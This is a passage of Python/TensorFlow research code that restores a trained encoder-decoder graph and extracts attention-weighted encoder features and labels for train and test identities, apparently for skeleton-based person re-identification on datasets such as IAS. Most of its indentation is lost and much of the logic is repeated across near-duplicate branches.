            # Attention matrices/states used later to form AGEs.
            if use_attention:
                alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
                # train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
                attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
                attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
                alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
            lr = loaded_graph.get_tensor_by_name('learning_rate:0')
            keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
            source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
            target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
X = []
C_X = []
X_all_op = []
X_final_op = []
X_final_c = []
X_final_h = []
X_final_c1 = []
X_final_h1 = []
X_final_ch = []
X_final_ch1 = []
y = []
C_y = []
X_pred = []
t_X = []
t_C_X = []
t_y = []
t_C_y = []
t_2_X = []
t_2_C_X = []
t_2_y = []
t_2_C_y = []
t_X_pred = []
t_X_att = []
# print(t_ids)
# print(test_attention)
ids_ = sorted(ids.items(), key=lambda item: item[0])
t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
if dataset == 'IAS':
t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
# print(ids_)
# exit(1)
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
else:
X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state,
alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state,
alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_0 = np.array(X)
y_0 = np.array(y)
X_pred_0 = np.array(X_pred)
t_X_pred_0 = np.array(t_X_pred)
from sklearn.preprocessing import label_binarize
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_0 = t_2_y
t_2_X_0 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_0 = t_y
t_X_0 = t_X
else:
# checkpoint 0
_targets = np.load(
'Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/target_' + dimension + '_' + dataset + '_' + str(
time_steps) + '.npy')
_targets = _targets.reshape([-1, time_steps, series_length])
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
X = []
C_X = []
X_all_op = []
X_final_op = []
X_final_c = []
X_final_h = []
X_final_c1 = []
X_final_h1 = []
X_final_ch = []
X_final_ch1 = []
y = []
C_y = []
X_pred = []
t_X = []
t_C_X = []
t_y = []
t_C_y = []
t_2_X = []
t_2_C_X = []
t_2_y = []
t_2_C_y = []
t_X_pred = []
t_X_att = []
# print(t_ids)
# print(test_attention)
ids_ = sorted(ids.items(), key=lambda item:item[0])
t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
if dataset == 'IAS':
t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
# print(ids_)
# exit(1)
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
# else:
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# X.append(c_vec)
else:
X.extend(att_op.tolist())
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# # if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# att_batch.append(att_op)
# att_batch = np.array(att_batch)
# _, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'c':
# X_pred.append(t2)
# elif type == 'ch':
# t3.extend(t2)
# X_pred.append(t3)
# elif type == 'o':
# X_pred.append(t1)
# elif type == 'oc':
# t1.extend(t2)
# X_pred.append(t1)
# elif type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# X_pred.append(att_op)
# else:
# X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# # if Bi_LSTM:
# # f_o_bw = encoder_outputs_bw[index, :, :]
# # f_o = f_o + f_o_bw
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# X_pred.append(f_o)
# else:
# X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X.append(att_op)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_X.append(c_vec)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X_pred.append(att_op)
# else:
# t_X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# t_X_pred.append(f_o)
# else:
# t_X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# t_X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
